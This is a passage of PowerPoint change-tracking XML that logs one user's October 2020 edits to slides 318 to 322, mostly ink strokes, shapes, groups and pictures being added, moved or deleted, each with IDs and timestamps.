            <ac:inkMk id="23" creationId="{0FB004DB-3B91-42BC-AF70-EC5A9FB8DB52}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:32.362" v="13335" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="24" creationId="{A2662CA7-F611-491C-AB92-FE3ED12E020F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:32.234" v="13334" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="25" creationId="{489478C9-A81D-426F-ADBA-766280140057}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:32.125" v="13333" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="26" creationId="{5D0D4462-65D4-4589-B4AE-E7AD9333D179}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:31.906" v="13332" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="27" creationId="{9129FD48-EC7E-4D1D-B6C3-3C81B890B0E3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:31.731" v="13331" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="28" creationId="{B2AC4C95-F4DD-486E-907D-2CC5E0220F9B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:34:31.475" v="13330"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="29" creationId="{01F33004-2EE9-45DE-B0B5-AF7601848F1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1" creationId="{AD9C54D5-2DF8-4D1E-8238-E76727F45688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2" creationId="{9C8E4168-69D5-4EF9-B15A-BA2AEB1C4A43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3" creationId="{09ECF8A4-8D1D-4BC3-BEF3-9BDAA8FF274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4" creationId="{8F93437B-F85D-4125-9687-30B1E3B75B3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5" creationId="{84E64A6B-6FB7-43DE-80E0-65255AB3A23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7" creationId="{C61834A8-3C09-45B1-8F64-F7BD144E3385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8" creationId="{3888D57B-0D40-4506-BAAB-43F8EFF1791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9" creationId="{88C06193-57BE-4019-A4DF-25421FFD40E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1" creationId="{F475C2A7-DEE6-48C4-8194-9406A151CC47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2" creationId="{797DE076-AC42-4D1D-94B1-3F086177FB4D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3" creationId="{616627CC-73E0-4CB2-8533-84B697FF8B5B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4" creationId="{9849DAD0-18DC-4394-9FBF-2B0D187642F6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5" creationId="{6DFB1F97-AB0F-423E-BD04-196C3D196E0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6" creationId="{6DB4AFCE-254A-49A8-AA5D-CFF78F94A35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7" creationId="{0E77E990-208C-4857-B2CA-ECAF050427F2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8" creationId="{B8DD2A25-0767-4B5D-B361-51B1581E9B93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50" creationId="{9A814CC4-C86D-47A2-9A5A-39C9FA62D3C0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:18.504" v="13389" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="51" creationId="{C5D28320-5A73-422F-A2F4-B3142BE79FBE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:18.083" v="13388" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="52" creationId="{27FE1D41-12A1-46AE-AA73-35004CE646E8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:17.331" v="13387" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="53" creationId="{147A41A1-929D-41E8-BB96-E2E1BB789887}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:17.179" v="13386" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="54" creationId="{E17FA900-63A8-4D5B-BB95-1CD4F830DF10}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:17.074" v="13385" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="55" creationId="{6610D0AE-C442-4016-84B0-B2460EA21930}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.906" v="13384" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="56" creationId="{7F31BA29-49D9-46C6-A8E6-88EEEFEF9966}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.770" v="13383" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="57" creationId="{C87AE532-736C-4808-9D61-BE1247BDE28C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.560" v="13382" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="58" creationId="{B93436C3-5B90-4E16-8690-2A5DBC078F86}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.395" v="13381" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="59" creationId="{F5D06598-026D-4CEC-AD75-A7D51E9DD448}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.234" v="13380" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="60" creationId="{6F0EDE22-AAF3-472A-BF09-FBB12CA3D13A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:16.070" v="13379" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="61" creationId="{33D785D0-A090-4E12-A17C-3691C93602F5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:35:15.815" v="13378"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="62" creationId="{090228CE-A14B-444D-9D36-6789EDB7028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4" creationId="{97E3E731-EE21-4884-83C0-138D86823C3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5" creationId="{DA8017E6-D548-4973-9CE8-863A0A436E4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6" creationId="{1DA21BC2-5017-4FDF-9FDD-0C913A7A97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8" creationId="{154B437F-6CBA-4589-BFFD-F66CC2653825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9" creationId="{C4087404-EC01-41E0-ACD0-B8A2131EEB31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0" creationId="{DAC1F920-BE46-432B-8883-787BB6AECC0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1" creationId="{4C93F155-4553-44C0-AF5A-827866B6FE6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2" creationId="{7FFC3A59-476D-4CDC-ABD7-CB452F8EEC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3" creationId="{16585F0A-6717-4BB7-BFF1-397DED40E52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4" creationId="{CE49102D-1F39-4C2F-84FC-659EA8322E7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5" creationId="{B0343A30-1627-4080-AC04-25E8CF02DCD0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6" creationId="{D47108EC-4DAF-48DA-B5AF-58A159DDEC5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7" creationId="{FFF4AF75-8FCC-4478-BD60-EB768E657E7F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8" creationId="{76267DE6-2FD3-48A6-B2F0-B2828F45319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9" creationId="{7AB7531B-4490-4AF3-81B1-4A755C03545B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0" creationId="{64B93DC3-756A-4F21-96BD-6F62B0201AA8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2" creationId="{C1173A82-D87E-49A6-A428-43B376DF6E54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83" creationId="{2BB700F6-7ECB-4F2C-A5BF-B9D3534159DC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:36:27.117" v="13416" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="86" creationId="{63B1C41A-F8E5-4E97-996B-A63AD5784B4B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87" creationId="{0BEAB219-1E9D-4A70-9339-1033ED06ECC4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod topLvl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88" creationId="{B8518728-CB17-4896-8F55-D95AB4CDAA82}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod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91" creationId="{C3F98B3A-436A-4D54-B469-40DDF35B521E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:37:34.281" v="13451" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4042374777" sldId="318"/>
            <ac:inkMk id="93" creationId="{1CCACCEE-6CD0-4C7C-AA62-8E628E3E65F1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94" creationId="{F8F484B0-95F3-4B6B-930E-E9ACBF616F82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8:00:40.788" v="15569"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1605790671" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:39:04.253" v="13458"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1605790671" sldId="319"/>
            <ac:spMk id="90" creationId="{31243BF4-AA57-4B9C-A366-EF40D7F30965}"/>
          </ac:spMkLst>
        </pc:s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3" creationId="{D1799678-1D9D-4613-9908-2AF4D90A98CE}"/>
          </ac:grpSpMkLst>
        </pc:gr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6" creationId="{5B783303-DB2B-46B4-B048-CB9AE050FC43}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:00:13.318" v="15563" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1605790671" sldId="319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39:54.904" v="13463" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1605790671" sldId="319"/>
            <ac:picMk id="2" creationId="{6BDD3A9C-29B8-48DD-A8EE-B02014FEC3B4}"/>
          </ac:picMkLst>
        </pc:pic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4" creationId="{EA862D29-CE34-4A56-A5BC-E0A03C4C7FE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5" creationId="{CD3D094A-77F9-46BC-AB14-E81F4E55286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7" creationId="{5B7C2AC2-A16E-4C07-B2AD-C6FDF70EBF6D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8" creationId="{011615B9-BF3E-4000-938C-06C9F1B96D13}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:00:15.702" v="15564" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1605790671" sldId="319"/>
            <ac:inkMk id="91" creationId="{C3F98B3A-436A-4D54-B469-40DDF35B521E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7:58:40.358" v="15545"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="506725017" sldId="320"/>
        </pc:sldMkLst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4" creationId="{8305F4AF-0BBA-4FF5-B960-3988B04F00C4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg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7" creationId="{BBAC29DF-FC8C-4D0A-8BCC-9A479C568C4B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:58:13.315" v="15541" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320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42:18.171" v="13469" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320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6:42:13.626" v="13467" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320"/>
            <ac:picMk id="3" creationId="{7899AABB-0D91-44BF-9085-DA1BA9248A04}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:44:16.755" v="13473" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320"/>
            <ac:picMk id="4" creationId="{9709DC75-C1A6-4E3F-A776-D4F21943EC8C}"/>
          </ac:picMkLst>
        </pc:pic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5" creationId="{DF2A3066-FA7B-4FB8-92C8-7671B2D56CA9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6" creationId="{23461BCC-15BA-4E06-B770-EAF3FF5F0938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8" creationId="{91CA86CB-FA8A-491A-BCE4-4B87E35269F3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9" creationId="{E364091F-EB9B-49FE-8A33-C142FC530DB1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:58:10.717" v="15540" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320"/>
            <ac:inkMk id="88" creationId="{B8518728-CB17-4896-8F55-D95AB4CDAA82}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:58:15.174" v="15542" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="506725017" sldId="320"/>
            <ac:inkMk id="91" creationId="{C3F98B3A-436A-4D54-B469-40DDF35B521E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:23:49.416" v="15784"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="289691000" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:49:53.996" v="15470" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:spMk id="3" creationId="{7EBD9C13-020F-458A-AAA0-C04CE55FBCA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:46:26.654" v="13511" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:spMk id="55" creationId="{D9E3E30B-A321-4E7F-947D-17701F438A3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:47:09.250" v="13546" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321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7:49:11.182" v="15469" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:spMk id="67" creationId="{91CBD7F4-0FA0-4282-AC93-97D9362F5AE9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:22:47.525" v="15778" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:spMk id="81" creationId="{A88FF80B-B657-4F84-B72F-D16ADB4731EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:44:23.850" v="13475" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:spMk id="90" creationId="{31243BF4-AA57-4B9C-A366-EF40D7F30965}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:49:05.411" v="15468" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321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7:47:58.285" v="15440"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:grpSpMk id="16" creationId="{4F190F4D-48F1-49ED-9D52-7083977B069C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:44:22.309" v="13474" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:grpSpMk id="95" creationId="{2A57CF0C-C2F5-4698-A49D-BC3CB0B481CD}"/>
          </ac:grpSpMkLst>
        </pc:grp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6" creationId="{3FDFA309-1455-4B4D-B129-1C77B2276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7" creationId="{1A529CB7-F947-4AA5-86F5-DBF3106B2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9" creationId="{F5451ED0-72B6-47E9-9ECE-35F99B4B19E3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del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12" creationId="{DB283ED9-AC63-4746-8295-BCB8AAE45C3D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:48:00.695" v="15441" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:inkMk id="17" creationId="{1D7883C2-F4C9-4E10-9723-FF3F395719B6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:44:24.890" v="13476" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="289691000" sldId="321"/>
            <ac:inkMk id="91" creationId="{C3F98B3A-436A-4D54-B469-40DDF35B521E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:07:58.006" v="14416"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370582596" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T16:59:01.523" v="14229" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:spMk id="2" creationId="{95F499D4-4827-45F0-BA0B-CCA80F623928}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:03:23.572" v="14344" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:spMk id="3" creationId="{67DBCC2B-CD6F-473B-851C-7211AD13BA73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:04:58.033" v="14356" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:grpSpMk id="10" creationId="{3423936E-45C0-4132-904F-00E54C562801}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:05.797" v="14358" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:grpSpMk id="11" creationId="{80740DFB-949F-4E0A-B6F0-F8C46A5B0786}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:12.396" v="14360" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:grpSpMk id="14" creationId="{6E393927-6F99-4942-A700-FB191E9D6FC7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:19.844" v="14363" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:grpSpMk id="17" creationId="{B5C8C694-6607-453D-83AA-68A2B80D6A78}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:04:20.570" v="14347" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="4" creationId="{D12D6B79-BE3D-476B-A1AF-CACB26AE3D4A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:04:31.563" v="14349" actId="1076"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="5" creationId="{D315855F-4E94-4008-8480-FBA9F0086869}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
